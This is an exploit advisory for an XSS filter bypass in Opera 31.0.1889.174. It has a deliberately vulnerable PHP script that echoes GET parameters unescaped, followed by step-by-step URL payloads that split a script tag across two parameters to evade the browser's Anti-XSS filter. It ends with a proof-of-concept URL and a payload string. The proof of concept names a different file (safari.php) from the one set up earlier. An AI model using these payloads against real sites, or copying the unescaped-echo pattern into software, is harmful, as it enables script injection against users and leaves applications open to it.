Opera 31.0.1889.174 XSS Filter Bypass

# Exploit Title: Opera 31.0.1889.174 XSS Filter Bypass
# Exploit Author: Mahdi.Hidden
# Vendor Homepage : http://www.opera.com/
# Software Link: http://www.opera.com/computer/thanks?ni=stable&os=windows
# Version: 31.0.1889.174
# Date: 2015-08-28
# Tested on: Windows

# Description
# XSS attacks occur when a PHP script doesn't filter the inputs and  
show it clearly on the webpage. This vulnerability is very usual on  
websites web applications.there are a lot of websites which have this  
vulnerability. XSS will happen with a JavaScript code in usual and  
that's why the browsers use XSS Filter. The XSS Filter on browsers  
detects JavaScript in URL and HTTP POST requests. If JavaScript is  
detected, the XSS Filter won't let JavaScript to executing. However,  
the XSS filter can by bypassed in some ways. i will show you what i  
found.

# Full Explanation
# Opera browser is a famous browser in internet and for this reason  
the opera company should secure the browser to users. one of this  
security issues is the Anti-XSS. The Anti-XSS stops executing  
javascript and today i'm going ro bypass it.

# Fist, make a vulnerable PHP file (EX: opera.php):
<?php
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."<br><br>";

// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."<br><br>";
?>

# Next, i want to test a simple XSS payload like this:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)</script>&text2=ashiayne

# that JS code will be shown in the source but you will get no alert  
and if you see the source you find that your code was shown with red  
highlight.that's for high security of opera. if you try to test other  
payloads you will see the same result.

# OK, let's try using script tag (<scrip>) without closing. it means this:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)&text2=ashiayne

# Again the code will be shown but it won't have any red highlight and  
the JS code is known as a HTML text, because of the none-closing tag.

# Well, let's try closing tag on parameter 2:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)&text2=</script>

# in this one, your code will be completely shown without any red  
highlight or something like that, but again it will be known as a HTML  
text.

# let's try using quoting and put the none-code texts in 2 quotations!  
for example using void(''), put void(' in the parameter one and close  
it in parameter 2 like this ') now let's try it:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/);void('&text2=')</script>

#  You will see the alert!! Your JS code will be execute. instead of  
void(''), you can use document.write('') or etc.

# For example:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

# POC:
http://[HOSTNAME]/[PATH]/safari.php?text1=<script>alert(/XSS/);void('&text2=')</script>

# Payload:
?text1=<script>alert(/XSS/);void('&text2=')</script>

# Thanks.
# Mahdi.Hidden
# Ashiyane Digital Security Team